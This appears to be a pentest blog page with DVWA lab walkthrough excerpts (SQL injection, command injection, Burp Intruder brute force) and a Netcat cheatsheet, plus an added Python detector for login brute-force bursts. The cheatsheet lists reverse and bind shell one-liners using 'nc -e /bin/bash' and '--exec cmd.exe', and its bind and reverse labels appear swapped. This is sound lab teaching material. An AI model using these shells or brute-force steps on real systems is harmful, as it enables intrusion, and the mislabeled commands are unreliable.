OpenSSH Documentation
Add Date to NMap Filenames
Snippet to add the current date to the nmap output filename.
Mounting VMWare Shared Folders on Linux (Kali)
Create a new file with the following contents and save it as mount-shared-folders.sh. Make the file executable and run the script as root. Your shared folders from the host computer should now be accessible at /mnt/hgfs.
DVWA Walkthrough Part 6: SQL Injection
For the sixth installment of our Damn Vulnerable Web App walkthrough we will use a SQL injection vulnerability to obtain all of the usernames and passwords within the application. This is another vulnerability that is very simple to exploit and really doesn’t require the aid of Burp Suite at all. In a more complex application we may want to use tools like Burp Suite…
Netcat Cheatsheet
Bind and Reverse Shells
(Windows) Netcat bind shell: C:\> nc 10.1.1.1 4444 --exec cmd.exe
(Windows) Netcat reverse shell: C:\> nc -lp 31337 --exec cmd.exe
(Linux) Netcat bind shell: victim:~# nc 10.1.1.1 4444 -e /bin/bash
(Linux) Netcat reverse shell: victim:~# nc -lp 31337 -e /bin/bash
Moving Files
On Source: source:~# nc 10.1.1.1 4444 < input.txt
On Destination: destination:~# nc -lp…
DVWA Walkthrough Part 3: Command Injection
For the third installment of our Damn Vulnerable Web App walkthrough we will tackle command injection via the web. This is very simple to exploit and really doesn’t require the aid of Burp Suite at all. The intended use of this app is for the user to enter an IP address and the server will run the ping command against the provided…
DVWA Walkthrough Part 2: Brute Force
The objective of Part 2 of this walkthrough is to brute force the logon mechanism of the Damn Vulnerable Web App (DVWA) in order to obtain a valid username and password of the administrator account. To accomplish this we will use Burp Suite. Before you start make sure you have completed the setup steps in: Burp Suite Tutorial – Part 1: Setup.
In your web browser navigate to http://<IP address>/vulnerabilities/brute/
Next, make sure that “Intercept is on” is enabled and submit the form. Burp will intercept the traffic and display the HTTP request made to the server by your browser. From the Action drop down select “Send to Intruder”.
Navigate to the Intruder tab. The Intruder module is useful for fuzzing specific parameters within a request. The § symbol indicates where Burp will insert its payloads into each request.
In this case we want to brute force the username and password arguments. We do not want to brute force the login, PHPSESSID, or security arguments so highlight those and select ‘Clear §’ to remove the placeholders.
Switch the “Attack type” drop down to Cluster Bomb. This mode will use separate lists to fuzz the username and password arguments and will try all combinations.
Next, select the Payloads tab. For payload 1 we want to pass in a list of user names. We will use a simple list of usernames in this example.
Next, select payload 2 from the Payload set drop down. This time we will provide a simple list of passwords to guess.
Select Intruder > Start attack
Finally, we can see each request that has been sent to the server, and the combinations of usernames and passwords that we provided.
We can see that the length of the server response in request #1 has changed significantly from the baseline request and the other requests. This is interesting and should be investigated. Request #1 has the correct username and password combination. We can validate that we have successfully gained access to the admin account by clicking “Response” > “Render”, where we are greeted with the text “Welcome to the password protected area admin”.
Whenever you are fuzzing with Burp check the Length of the responses as it may be an indication of a weakness.
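The same length heuristic is just as useful on the defending side. The following Python script is an added example (not part of the original walkthrough): it parses Apache combined-format access log lines, flags any client that fires a burst of login attempts at /vulnerabilities/brute/ faster than a human would, and then reports the attempt whose response size differs from that client's usual one, which is the likely successful guess. The log lines are constructed for the example, and the login path, the five-attempts-per-minute threshold and the response-size heuristic are assumptions, not something DVWA or Burp provides.

```python
"""Detect password-guessing bursts against a login endpoint in web server access logs."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache "combined" log format; this is not real traffic.
# 10.0.0.9 logs in twice, half an hour apart (normal). 10.0.0.5 loads the page, then fires
# eight guesses in thirty seconds; one of them returns a different page size (the success).
SAMPLE_LOG = """\
10.0.0.9 - - [12/Mar/2016:09:00:10 +0000] "GET /vulnerabilities/brute/?username=bob&password=Summer16&Login=Login HTTP/1.1" 200 4451 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2016:10:14:55 +0000] "GET /vulnerabilities/brute/ HTTP/1.1" 200 4380 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2016:10:15:01 +0000] "GET /vulnerabilities/brute/?username=admin&password=test&Login=Login HTTP/1.1" 200 4451 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2016:10:15:05 +0000] "GET /vulnerabilities/brute/?username=admin&password=letmein&Login=Login HTTP/1.1" 200 4451 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2016:10:15:09 +0000] "GET /vulnerabilities/brute/?username=admin&password=123456&Login=Login HTTP/1.1" 200 4451 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2016:10:15:13 +0000] "GET /vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.1" 200 4512 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2016:10:15:17 +0000] "GET /vulnerabilities/brute/?username=user&password=test&Login=Login HTTP/1.1" 200 4451 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2016:10:15:21 +0000] "GET /vulnerabilities/brute/?username=user&password=letmein&Login=Login HTTP/1.1" 200 4451 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2016:10:15:25 +0000] "GET /vulnerabilities/brute/?username=user&password=123456&Login=Login HTTP/1.1" 200 4451 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2016:10:15:30 +0000] "GET /vulnerabilities/brute/?username=user&password=password&Login=Login HTTP/1.1" 200 4451 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2016:09:30:42 +0000] "GET /vulnerabilities/brute/?username=bob&password=Summer2016&Login=Login HTTP/1.1" 200 4451 "-" "Mozilla/5.0"
"""

# client ip, timestamp, method, request target, status, response size (%b)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\d+|-)"
)
LOGIN_PATH = "/vulnerabilities/brute/"  # assumed: the DVWA brute-force page


def parse_line(line):
    """Return a dict for a login attempt (request carrying username and password), else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != LOGIN_PATH:
        return None
    qs = parse_qs(url.query)
    if "username" not in qs or "password" not in qs:
        return None  # plain page load without a submitted form is not an attempt
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "username": qs["username"][0],
        "size": int(m.group("size")) if m.group("size") != "-" else 0,
    }


def max_attempts_in_window(times, window):
    """Largest number of timestamps that fall inside any span of length `window` (two-pointer sweep)."""
    times = sorted(times)
    best = start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag each client IP with at least `threshold` login attempts inside any `window`.

    For a flagged IP the alert also lists attempts whose response size differs from that IP's
    most common size: a successful login renders a different page than a failure, so the odd
    one out is the guess that most likely worked. Guessed passwords are deliberately left out
    of the alert so they do not end up in a second log.
    """
    by_ip = defaultdict(list)
    for line in lines:
        attempt = parse_line(line)
        if attempt:
            by_ip[attempt["ip"]].append(attempt)

    alerts = []
    for ip, attempts in by_ip.items():
        burst = max_attempts_in_window([a["ts"] for a in attempts], window)
        if burst < threshold:
            continue
        common_size = Counter(a["size"] for a in attempts).most_common(1)[0][0]
        outliers = [(a["username"], a["size"]) for a in attempts if a["size"] != common_size]
        alerts.append({
            "ip": ip,
            "attempts": len(attempts),
            "burst": burst,
            "distinct_usernames": len({a["username"] for a in attempts}),
            "outliers": outliers,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

Run against the constructed log the script raises one alert for 10.0.0.5 (eight attempts, two usernames) and singles out the admin attempt that returned 4512 bytes instead of 4451. On a real server the same logic applies to a POST-based login if the parameter check is moved from the query string to a request body that your logging captures; the point is that Intruder's "look at the Length column" tip works equally well as a detection signal in your own access logs.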
Damn Vulnerable Web App (DVWA) is an intentionally vulnerable PHP/MySQL web application that penetration testers can use to learn and practice exploiting many types of common web vulnerabilities. Getting DVWA: the DVWA code is available from http://www.dvwa.co.uk; however, there is a preloaded Linux server available from vulnhub.com. The quickest way to get started is to download the .iso file and boot the…
That’s it for part 2! You can now see how easy it is to quickly automate HTTP/HTTPS fuzzing using Burp Suite.
DVWA Walkthrough Part 1: Setup